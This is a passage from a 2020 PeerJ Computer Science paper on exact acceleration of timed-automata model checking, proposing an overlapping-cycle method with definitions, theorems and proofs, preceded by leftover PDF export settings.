<FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_wlzntvhrtjanfdcmp72fytknpe ---- Submitted 2 October 2019 Accepted 5 April 2020 Published 4 May 2020 Corresponding author Lei Zhuang, ielzhuang@zzu.edu.cn Academic editor Maurice ter Beek Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.272 Copyright 2020 Wang et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Exact acceleration of complex real-time model checking based on overlapping cycle Guoqing Wang1, Lei Zhuang1, Yu Song1, Mengyang He1, Ding Ma2 and Ling Ma1,3 1 School of Information Engineering, Zhengzhou University, Zhengzhou, Henan, China 2 College of Information Science and Engineering, Henan University of Technology, Zhengzhou, Henan, China 3 Digital Medical Image Technique Research Center, Zhengzhou University, Zhengzhou, Henan, China ABSTRACT When real-time systems are modeled as timed automata, different time scales may lead to substantial fragmentation of the symbolic state space. Exact acceleration solves the fragmentation problem without changing system reachability. The relatively mature technology of exact acceleration has been used with an appended cycle or a parking cycle, which can be applied to the calculation of a single acceleratable cycle model. Using these two technologies to develop a complex real-time model requires additional states and consumes a large amount of time cost, thereby influencing acceleration efficiency. In this paper, a complex real-time exact acceleration method based on an overlapping cycle is proposed, which is an application scenario extension of the parking- cycle technique. By comprehensively analyzing the accelerating impacts of multiple acceleratable cycles, it is only necessary to add a single overlapping period with a fixed length without relying on the windows of acceleratable cycles. Experimental results show that the proposed timed automaton model is simple and effectively decreases the time costs of exact acceleration. For the complex real-time system model, the method based on an overlapping cycle can accelerate the large scale and concurrent states which cannot be solved by the original exact acceleration theory. Subjects Real-Time and Embedded Systems, Theory and Formal Methods Keywords Real-time model checking, Exact acceleration, Complex real-time system, Timed automata, Overlapping cycle INTRODUCTION In real-time embedded systems, especially complex real-time control systems, discrete logic control and continuous time behavior depend on and influence each other. Take the Internet of things (IoT) gateway security system (Wang et al., 2018) as an example: its control center generally has many different control modes to deal with diverse security risks, such as tampering, intrusion, and identity forging. Important system parameters (e.g., sensor status, monitoring instructions, and terminal feedback information) change continuously over time. To meet specific time constraints or parameter values in the IoT gateway security system, the management mode must be adjusted over time. The change rules of important parameters also differ by mode, and the response time to How to cite this article Wang G, Zhuang L, Song Y, He M, Ma D, Ma L. 2020. Exact acceleration of complex real-time model checking based on overlapping cycle. PeerJ Comput. Sci. 6:e272 http://doi.org/10.7717/peerj-cs.272 https://peerj.com/computer-science mailto:ielzhuang@zzu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.272 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.272 various events should be modified accordingly. In this type of system (Lee et al., 2019), logic control describes the logical control transformation of the system through models with high abstraction levels, such as finite state machine and Petri net. Time behavior can be simulated by clock variables and clock zone transformation. Between the two layers, signals of the continuous layer and control modes of the discrete layer are correlated and transformed by certain interfaces and rules. Typically, test and simulation technologies are the main means of guaranteeing software quality; however, they cover problems when using the operating system as the main measure, which cannot guarantee test completeness. These approaches are thus incapable of traversing all states in a real-time system, leading to covert problems in system operations (Wang, Pastore & Briand, 2019). In the field of security-related systems with zero tolerance for system error, using formal theory and technology for security authentication results in clear descriptions and avoids the complexity of safety verification. Formal description analysis and refinement have thus become a focus of recent research in related fields. In real-time model checking, timed automata can model the temporal behavior of real-time systems (Pinisetty et al., 2017). Clocks describe the state transitions, and clock constraints serve as the theoretical basis for real-time system model checking (Han, Yang & Xing, 2015). This approach can easily realize automatic combination and transformation with other methods. The method is widely used in polling control systems, railway interlocking systems, and similar applications. Due to clock variables, control programs and external environments often use different time measures, which can cause the number of states to increase exponentially when a timed automaton is transformed into a zone automaton. The reachability analysis algorithm generates many state fragments (Iversen et al., 2000; Chen & Cui, 2016), resulting in a sharp increase in the state space and considerably prolonged detection time. The acceleration technique is a reduction method used to solve the fragmentation problem following from time measurement differences. Dubout & Fleuret (2013) applied an acceleration technique to linear target detection and effectively improved the detection performance. Jeong et al. (2014) applied an implicit Markov model as an improved framework to accelerate the inference model. For distributed and parallel computing, a workstation and a multicore processor were used to accelerate state-space searching (Konur, Fisher & Schewe, 2013). Lin, Chen & Xu (2017) studied an acceleration model using a Bayesian classifier by analyzing the behavior of heterogeneous population trends; results indicated that acceleration in the reliability assessment improved the analytic accuracy. The model checking of linear temporal logic (LTL) model was studied by Barnat et al. (2010), which employed computed unified device architecture for acceleration. Two SAT problem solvers were used to validate online models and accelerate the processing of complex behaviors (Qanadilo, Samara & Zhao, 2013). The reachability problem is the first to consider in timed automata, which determines whether a path exists from its initial state to a target state. This problem can be solved by computing the zones that apply the abstraction technique in practice. State-of-the-art abstraction methods (Behrmann et al., 2006; Herbreteau, Srivathsan & Walukiewicz, 2016) produce an approximation closer to the actual reachable clock valuation, which includes Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 2/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 coarser abstractions. Exact acceleration is an excellent means of abstraction to reduce required storage space and can alleviate state-space explosion. For practical issues such as protocol validation (Zhang et al., 2013), IoT system modeling (Li et al., 2013), and smart contract security verification in blockchain (Cruz, Kaji & Yanai, 2018; Grishchenko, Maffei & Schneidewind, 2018), exact acceleration technology is an efficient way of minimizing required storage space and time. When Iversen et al. (2000) used UPPAAL to verify the LEGO robotic system, a fragmentation problem was identified and briefly described, and some ideas for further research were suggested. An approximation technique was applied to a real-time system model for security and connectivity analysis, which avoided repetitive control (Möller, 2002). After that, a real-time property language L∀S was proposed to check the rejection state of reachability and reduce safety and boundary liveness simultaneously (Aceto et al., 2003). The problems and methods in these publications have promoted the concept of exact acceleration and inspired further research. Related studies on exact acceleration in real-time model checking include Hendriks & Larsen (2002), Yin, Song & Zhuang (2010), Yin, Zhuang & Wang (2011), Gou et al. (2014), Boudjadar et al. (2016), and Chadli et al. (2018). In the following four examples, the window of the acceleratable cycle is [a,b]. • Hendriks & Larsen (2002) introduced a method of syntax adjustment to a subset of timed automata by adding an appended cycle whose length was da/(b−a)e times longer than that of the acceleratable cycle. This method accelerates forward symbolic reachability analysis, which solves the fragmentation problem and optimizes the verification of the LEGO robotic system. • Yin, Song & Zhuang (2010) proposed a method to identify the acceleratable cycle in timed automata by introducing topological sorting for a large state space of a timed automaton; by simplifying the scale of timed automata, the method operated efficiently. • An exact acceleration method based on a parking cycle was proposed (Yin, Zhuang & Wang, 2011), in which the entry boundary condition was determined by the size of the acceleratable cycle’s window (the condition is z ≥a× ab−a +n0); the automaton model improved the speed of exact acceleration and reduced the cost. • By analyzing the main parameters of the acceleration process, Gou et al. (2014) proposed a method for determining whether exact acceleration was required. This approach can be used to avoid adding an appended cycle to reduce verification speed when the number of fragments is small, or fragments do not satisfy certain conditions. • Boudjadar et al. (2016) proposed a development method to improve the utilization rate of resources by using model-checking technology. In the design and development stage, exact acceleration technology was used to greatly improve the capability of symbolic model checking in a processing scheduling system. For the scheduling problem of network physical systems, Chadli et al. (2018) modeled advanced specifications and validation frameworks with the help of exact acceleration technology, automatically transforming high-level specifications into formal models. The above two research works mainly applied exact acceleration to model a system resource scheduling problem but did not improve the original exact acceleration theory. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 3/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 When modeling a complex real-time system (Wang et al., 2019), multiple acceleratable cycles may overlap at the same location. If the appended cycle method is used for exact acceleration, then the added locations multiply as the number of acceleratable cycles increases, resulting in insufficient memory for model checking. If the parking cycle method is used for exact acceleration, acceleratable-cycle stacking leads to non-uniformity in parking-cycle entry conditions; differences in the windows of multiple acceleratable cycles can increase time consumption drastically. In this paper, we propose an exact acceleration method for complex real-time model checking based on an overlapping cycle, which is an application scenario extension of parking-cycle technique. A single overlapping cycle is developed by comprehensively analyzing the accelerating effects of multiple acceleratable cycles and analyzing acceleration differences among these cycles. The overlapping cycle is simple to create and has a fixed length, eliminating the need to add multiple locations for complex real-time models. The overlapping cycle adds much less state space than appended cycles or parking cycles in model checking, substantially reducing the acceleration cost. The proposed method can be effectively applied to modeling and verification of complex real-time systems such as the IoT gateway security system. It can also alleviate additional consumption of time and space caused by state-space explosion while maintaining the original nature of the system. The remainder of this paper is organized as follows. The section ‘Preliminaries’ briefly introduces timed automata, forward symbolic reachability analysis, and the theory of exact acceleration. The exact acceleration method for complex real-time models based on an overlapping cycle is proposed in ‘Exact Acceleration of Complex Real-time System Model Based on Overlapping Cycle’, which outlines the method of creating a single, fixed-length overlapping cycle. A timed automaton with an overlapping cycle is shown to accelerate the originally timed automaton with reachability. In ‘Experimental Results’, the acceleration effects of the appended cycle, parking cycle, and overlapping cycle with a complex real-time model example are compared using experiments. Finally, the ‘Conclusion’ provides a few ideas for future research. PRELIMINARIES Timed automata This part is based on work by Alur & Dill (1994). To illustrate the real-time clock of timed automata more clearly, we define a clock constraint set T(C) contain all clock constraints. We assume that the set of clock variables is C, and the definition of the set of clock constraints τ is as follows: τ :=c ∼n|τ1∧τ2 where c ∈C, n∈N, and ∼ denotes one of the binary relationships {<,≤,=,≥,>}. The clock constraint set T(C) is the set of all clock constraints τ . A clock interpretation ν is a mapping from C to R+∪{0}, where R+ represents the set of positive real numbers. Note that ν assigns each clock variable in the set of clock variables C. For a set X ⊆C, X :=0 indicates that X assigns 0 to each c ∈X (i.e., clock reset), whereas the clock variables in set C−X have no effects. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 Figure 1 Timed automaton M. Full-size DOI: 10.7717/peerjcs.272/fig-1 Definition 1 (Timed automaton). A timed automaton is defined as a six-tuple (C,L,L0,A,I,E), where C is a set of clocks, L is a finite set of locations, L0 ⊆L is the set of initial locations, A is a set of action events, I represents mapping that provides every location l ∈L with some clock constraint in T(C), and E ⊆L×A×T(C)×2C ×L is a set of edges. An edge (l,a,τ,λ,l ′ ) denotes a transition: when the clock constraint in location l satisfies τ , the system can complete action event a, move from location l to location l ′ , and allow clocks in λ to be reset. Figure 1 shows an example of a timed automaton. The timed automaton M represents a plain and abstract model of the control program and the external environment in a real-time system. If the control program sends instructions to the control center in an IoT security system, the environment will be decided by sensors and actuators. The cycle of locations L1, L2, and L3 model the control program labeled the control cycle, consisting of three atomic instructions, whose clock is x. The external environment is modeled by clock y, which is checked each time in L2. The clock y also called global clock. The size of the threshold constant LARGE determines how slow the environment is relative to the control program. If y ≥LARGE, the control cycle may be exited. The semantics of a timed automaton M is defined by a transition system S(M) with Alur & Dill (1994). A state of S(M) is a pair (l,ν), where l is a location of M and ν indicates a clock interpretation for C such that ν satisfies I(l). Regarding this transition system, the traces of a timed automaton have been defined by Hendriks & Larsen (2002). Forward symbolic reachability analysis The forward symbolic reachability analysis algorithm is a core of the real-time model- checking tool UPPAAL (Behrmann, David & Larsen, 2004). The model-checking engine uses an on-the-fly strategy to search forward from the initial location to determine whether a symbolic state is reachable. For each symbolic state that has not yet been explored, it is necessary to calculate subsequent states based on their clocks and actions and compare them to searched symbolic states. If they have been seen in the past, they are discarded; otherwise, they are added to the list of explored symbolic states. The reachability property ϕ of a timed automaton M can be presented as the timed computation tree logic (TCTL) formula E <> (P), where P is a state property of M. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 5/24 https://peerj.com https://doi.org/10.7717/peerjcs.272/fig-1 http://dx.doi.org/10.7717/peerj-cs.272 Table 1 Results of symbolic states from a forward symbolic exploration by timed automaton M. State Location Zone 1 L0 y =0 x =0 y − x =0 2 L1 3 < y ≤5 3 < x ≤5 y − x =0 3 L2 3 < y ≤7 0≤x ≤2 3 < y − x ≤5 4 L3 3 < y ≤11 0≤x ≤4 3 < y − x ≤7 5 L1 4 < y ≤12 1≤x ≤5 3 < y − x ≤7 6 L2 6 < y ≤14 0≤x ≤2 6 < y − x ≤12 7 L3 6 < y ≤18 0≤x ≤4 6 < y − x ≤14 8 L1 7 < y ≤19 1≤x ≤5 6 < y − x ≤14 9 L2 9 < y ≤21 0≤x ≤2 9 < y − x ≤19 10 L3 9 < y ≤25 0≤x ≤4 9 < y − x ≤21 11 L1 10 <y ≤26 1≤x ≤5 9 <y − x ≤21 12 L2 12 <y ≤28 0≤x ≤2 12 < y − x ≤26 We describe that M satisfies ϕ, denoted by M � ϕ, if a trace exists in the form of ((l0,ν0),(l1,ν1),...)∈Tr(M), where (li,νi)� P for some i≥0. To describe the process of forward symbolic reachability analysis, we take automaton M in Fig. 1 as an example. Table 1 shows the symbolic states that timed automaton M searches forward from the initial location after one execution. In Table 1, symbolic states 6 and 3 are both L2. However, the clock zones are not identical; these states represent two different symbolic states to be further forward searched. Therefore, every execution of the control cycle results in new symbolic states. Because the threshold LARGE is usually larger and clock y is especially smaller, the timed automaton M must execute a certain number of control cycles to increase clock y effectively when verifying the reachability of L4. The number of executions depends on LARGE; if LARGE is large, then there are more executions. Due to different clocks, when the model checking tools detect a symbolic model cycle by cycle, many unnecessary clock fragments may appear in the state space, causing a forward symbolic fragment problem. For example, if we only observe the symbolic states 3, 6, 9 and 12 of location L2, we can find that each clock zone overlaps with the zone in front of it, which is called clock zone continuous. At this time, because of the small-time measurement in the cycle, the overlapped clock zone is divided into infinite segments, which leads to the fragmentation problem. Table 1 lists results from the UPPAAL simulator. Exact acceleration Hendriks & Larsen (2002) proposed the concept of exact acceleration, based on which, we provide basic definitions for our study. The acceleratable cycle is a key concept in exact acceleration. An acceleratable cycle can use only one clock in clock constraints (including invariants, guards, and resets). Definition 2 (Acceleratable cycle). Let M = (C,L,l0,A,I,E) be a timed automaton, Ec =(e0,...,en−1)∈En, and x ∈C. An acceleratable cycle is defined as a two-tuple (Ec,x) when the following conditions are satisfied: Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 6/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 • Ec is a cycle; • for all locations in Ec, I(l) is either empty or in the form of {x ≤c}; • if (l,a,τ,λ,l ′ )∈Ec, then τ is empty or in the form of {x ≥ c}, and λ is empty or only contains x; and • x must be reset on all in-going edges to src(e0). Clock x is the clock of the cycle, I(l) is the location invariant, and τ is the edge guard. The location src(e0) is the reset location whose out-going edge is e0, which indicates the external clock’s checking position in the acceleratable cycle. If a specific location’s in-going edge is ei in the cycle, then the out-going edge of this position is ei+1, where i∈[0,n−2]. The cycle in automaton M (Fig. 1), composed of locations L1, L2, and L3, is an acceleratable cycle. The clock of the cycle is x, and the reset location is L2. The invariants and guards are in accordance with the defined form of clock x, and the clock resets to zero at the only in-going edge of L2. Definition 3 (Window of acceleratable cycle). Let an acceleratable cycle in the timed automaton M be (Ec,x). The compression sequence of all traces is expressed as Tr(Ec)= ( (l0,ν0), ( l0,ν ′ 0 ) ,(l1,ν1),...,(ln−1,νn−1), ( ln−1,ν ′ n−1 ) ,(ln,νn) ) , where νi and ν ′ i indicate different clock interpretations, i∈[0,n], and l0= ln= src(e0).((lj,ν ′ j),(lj+1,νj+1)) depends on the edge ej and can be understood as an action event of ej, j ∈[0,n−1]. The window of the acceleratable cycle (Ec,x) is defined as the interval [a,b], a,b∈N when the following conditions are satisfied: • the total delay of Tr(Ec) is an element of [a,b]; and • for any real number d ∈[a,b], we adjust the delays under legal clock constraints in Tr(Ec) to ensure the total delay is d. The meaning of the total delay in this definition is an increase in the clock of the cycle, which can be simply defined as the increment of the external clock when the acceleratable cycle returns to the reset location once from the initial location. The window is the minimal and maximal time it may take to pass through a cycle. According to this definition, the window of the acceleratable cycle shown in Fig. 1 can be calculated as [3,7]. Definition 4 (Accelerated automaton based on appended cycle). Let M = (C,L,l0,A,I,E)be a timed automaton, and let Cycle=(Ec,x) be an acceleratable cycle of M, where L= {l0,l1,...,lm}, Ec = (e0,e1,...,en−1), ei= (li,ai,τi,λi,li+1). Acceleration of M based on the appended cycle is a new automaton Acca(M,Cycle) defined as (C,L′,l0,A,I ′,E′), where • L′=L∪ { l′1,l ′ 2,...,l ′ n−1 } ∪ { l′0 } ∪ { l ′′ 1,l ′′ 2,...,l ′′ n−1 } • I ′(li)= I(li), 0≤ i≤m • I ′ ( l′i ) = I(li), 1≤ i≤n−1 • I ′ ( l′0 ) =∅ • I ′ ( l ′′ i ) = I(li), 1≤ i≤n−1 Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 7/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 • E′ = E ∪ {( l0,a0,τ0,λ0,l′1 ) , ( l′n−1,an−1,τn−1,λn−1,l ′ 0 )} ∪ {( l′0,a0,τ0,λ0,l ′′ 1 ) , ( l′′n−1,an−1,τn−1,λn−1,l0 )} ∪ { (l′i,ai,τi,λi,l ′ i+1),(l ′′ i ,ai,τi,λi,l ′′ i+1)|1≤ i≤n−1 } • in particular, E′=E∪ {( l0,a0,τ0,λ0,l′0 ) , ( l′0,a0,τ0,λ0,l0 )} when n=1. Theorem 1. Let M =(C,L,l0,A,I,E) be a timed automaton, and let Cycle =(Ec,x) be an acceleratable cycle of M with a window [a,b]. If ϕ is the reachability property of M, then 3a≤2b⇒(M �ϕ⇔Acca(M,Cycle) �ϕ). Theorem 1 has been proved in Hendriks & Larsen (2002). In Definition 4, the appended cycle is obtained by expanding the acceleratable cycle twice. If the timed automaton M is added to the appended cycle by expanding the acceleratable cycle i times, then the precondition in Theorem 1 can be generalized to (i+1)a≤ ib. Definition 5 (Accelerated automaton based on parking cycle). Let M =(C,L,l0,A,I,E) be a timed automaton, and let Cycle=(Ec,x) be an acceleratable cycle of M with a window of [a,b], where L= {l0,l1,...,lm}, Ec= (e0,e1,...,en−1), ei = (li,ai,τi,λi,li+1). The global clock is y, and the maximum value of y before entering the acceleratable cycle is n0. The acceleration of M based on the parking cycle is a new automaton Accp(M,Cycle) defined as (C,L′,l0,A,I ′,E′), where • L′=L∪ { l′0 } • I ′(li)= I(li), 0≤ i≤m • I ′ ( l′0 ) =∅ • E′=E∪ {( l0,a0,τ′,∅,l′0 ) , ( l′0,an−1,∅,λn−1,l0 )} , τ ′ is y ≥a× ⌈ a b−a ⌉ +n0. Definition 5 has been given in Yin, Zhuang & Wang (2011). The accelerated automaton Acca(M,Cycle) equals the timed automaton M with an appended cycle composed of locations l0,l ′ 1,l ′ 2,...,l ′ n−1,l ′ 0,l ′′ 1,l ′′ 2,...,l ′′ n−1. Accelerated automaton Accp(M,Cycle) equals the timed automaton M with a parking cycle whose edge guard y controls the acceleration timing. Only when the acceleratable cycle has been executed at leastda/(b−a)e times is the automaton permitted to enter the parking cycle. Figures 2 and 3 display the acceleration of M (Fig. 1) based on the appended cycle and parking cycle, respectively. They are labeled the accelerated automata Ma and Mp. Because the window of the acceleratable cycle is [3,7], the edge guard of the parking cycle is y ≥3 in Mp. Theorem 2. Let M =(C,L,l0,A,I,E) be a timed automaton, and let Cycle =(Ec,x) be an acceleratable cycle of M with a window of [a,b]. If ϕ is a reachability property of M, then a<b⇒(M �ϕ⇔Accp(M,Cycle) �ϕ). Yin, Zhuang & Wang (2011) gives this theorem form forward symbolic reachability analysis, and this is the previous achievement of our working group. We will give its another proof in the view of zone later. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 8/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 Figure 2 Accelerated automaton Ma based on appended cycle. Full-size DOI: 10.7717/peerjcs.272/fig-2 Figure 3 Accelerated automaton Mp based on parking cycle. Full-size DOI: 10.7717/peerjcs.272/fig-3 Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 9/24 https://peerj.com https://doi.org/10.7717/peerjcs.272/fig-2 https://doi.org/10.7717/peerjcs.272/fig-3 http://dx.doi.org/10.7717/peerj-cs.272 Figure 4 Timed automaton M ′. Full-size DOI: 10.7717/peerjcs.272/fig-4 EXACT ACCELERATION OF COMPLEX REAL-TIME SYSTEM MODEL BASED ON OVERLAPPING CYCLE The appended cycle and parking cycle technologies in exact acceleration apply to a real-time system model with a single acceleratable cycle. For a complex real-time system model (as Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 10/24 https://peerj.com https://doi.org/10.7717/peerjcs.272/fig-4 http://dx.doi.org/10.7717/peerj-cs.272 shown in Fig. 4), using these two technologies for exact acceleration requires additional states and consumes a large amount of time cost, which influences the acceleration effect. Figure 4 presents an example of the IoT gateway security system (in Wang et al., 2018). The timed automaton M ′ models a wireless sensor network including a reactive program and external environment. The run-time behavior control several sensors, which can be transformed into clock constrains in UPPAAL. Every location in the cycle represents a sensor model in the IoT system. The cycle’s clock is x, and clock y controls the execution time. The larger the constant LARGE is, the more slowly the timed automaton M ′ runs. Using the algorithm described by Yin, Song & Zhuang (2010) to identify the acceleratable cycle in M ′, we obtain four acceleratable cycles whose reset locations are all L1 and share the clock of cycle x. For this complex real-time model, we propose a method based on the overlapping cycle for exact acceleration. Theorem 3. Let M =(C,L,l0,A,I,E) be a timed automaton, and let Cycle =(Ec,x) be an acceleratable cycle of M with a window of [a,b]. If a < b, there is a positive integer n in the forward symbolic reachability analysis, which leads the reset location to obtain a continuous clock zone after executing the Cycle n times. Proof. According to the forward symbolic reachability analysis, the problem of fragments in the acceleratable cycle will inevitably lead to the overlap of clock zones, that is, the appearance of continuous clock zone. If a < b, according to the definitions about exact acceleration, the continuous clock zone will be got after several executions of the acceleratable cycle, and the point of the proof is to determine the number of executions. So, without loss of generality, we might assume that the execution number is a positive integer n. Let n be the rounds of Cycle execution, and let the interval [c,d] be the clock zone at the reset location before execution of the Cycle. At the reset location, the clock zone is continuous from the (n+1)th time onward; therefore, the clock zones obtained in the (n+1)th time and the nth time have an intersection that is (n+1)a+c ≤nb+d ⇒n≥(a+c−d)/(b−a). Because b>a, d ≥c, there must be an integer n≥a/(b−a). So, the number of executions should be at least da/(b−a)e. When the Cycle is executed da/(b−a)e (that is n) times, the reset location obtains a continuous clock zone, thereby completing the proof. Corollary 1. If the timed automaton M has an acceleratable cycle with a window of [a,b], a<b, then the reset location will obtain a continuous clock zone after executing the Cycle at least a/(b−a) times during forward symbolic reachability analysis. Proof. According to Theorem 3, we easily know the reset location obtains a continuous clock zone when the Cycle is executed n times. For the integer n, we can calculate that n≥a/(b−a). The proof is completed. Corollary 2. Let the global clock be y, and let the maximum value of y before entering the acceleratable cycle be n0. If the timed automaton M has an acceleratable cycle with a window of [a,b], a<b, then the reset location will obtain a continuous clock zone when the following condition is satisfied during forward symbolic reachability analysis: y−n0≥a×a/(b−a). Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 Proof. According to Corollary 1, the reset location will obtain a continuous clock zone after executing the acceleratable cycle at least a/(b−a) times. Because the window of the acceleratable cycle is [a,b], the increment of y by executing the acceleratable cycle a/(b−a) times is denoted as 1y ∈[a×a/(b−a),b×a/(b−a)], where 1y =y−n0. Therefore, when y−n0≥a×a/(b−a), the reset location will obtain a continuous clock zone. The proof is completed. Corollary 3. Let the global clock be y, and let the maximum value of y before entering the acceleratable cycle be n0. If the timed automaton M has an acceleratable cycle with a window of [a,b], a < b, then every location in the acceleratable cycle will obtain a continuous clock zone when y−n0≥a×a/(b−a). Proof. Because clock y is not the cycle clock, any invariant or guard in the acceleratable cycle will not contain clock y according to Definition 2. Based on the theory of timed automata, clock y exhibits monotonous growth when the acceleratable cycle is executed. Thus, when y−n0 ≥a×a/(b−a), per Corollary 2, the reset location begins to obtain a continuous clock zone, indicating that every location in the acceleratable cycle is reachable. At this point, a constant clock zone will also be received by any location in the acceleratable cycle, and the proof is completed. Next, we will give the new proof of Theorem 2. Proof. Sufficient Condition. The known condition is a < b. Because Accp(M,Cycle) is obtained by adding a parking cycle to M, the timed automaton M can clearly reach any reachable state in original model. The accelerated automaton Accp(M,Cycle) can also reach states by executing the same time trace; that is, the state transition system S(M) associated with M is included in the state transition system S(Accp(M,Cycle)) associated with Accp(M,Cycle). Necessary Condition. The known condition is a < b. Let the global clock be y. When y < a×a/(b−a)+n0, the accelerated automaton Accp(M,Cycle) does not execute the parking cycle, and reachable states in Accp(M,Cycle) are also reachable in the timed automaton M. When y ≥a×a/(b−a)+n0 (according to Corollary 3), every location in the acceleratable cycle of M will obtain a continuous clock zone; that is, after y ≥a×a/(b−a)+n0 at any time, M can reach any location in the acceleratable cycle and Accp(M,Cycle) executes the parking cycle, satisfies the edge guards, and returns to the reset location of any state, which guarantees that M is always reachable. In summary, when a<b, the accelerated automaton Accp(M,Cycle) does not change the reachability property ϕ of the timed automaton M, and the proof is completed. According to our theorems and corollaries, we can prove that the exact acceleration method based on the parking cycle is more concise and effective than that based on the appended cycle. On one hand, there is no location invariant in the parking cycle to ensure the clock can stay in this location for acceleration; on the other hand, the parking cycle contains an edge guard to ensure that any location of the acceleratable cycle obtains a continuous clock zone, which provides reachability. In this way, the parking cycle accelerates the search for the symbolic state by controlling acceleration timing and ensures reachability of the timed automaton to realize exact acceleration. The exact acceleration method for the complex 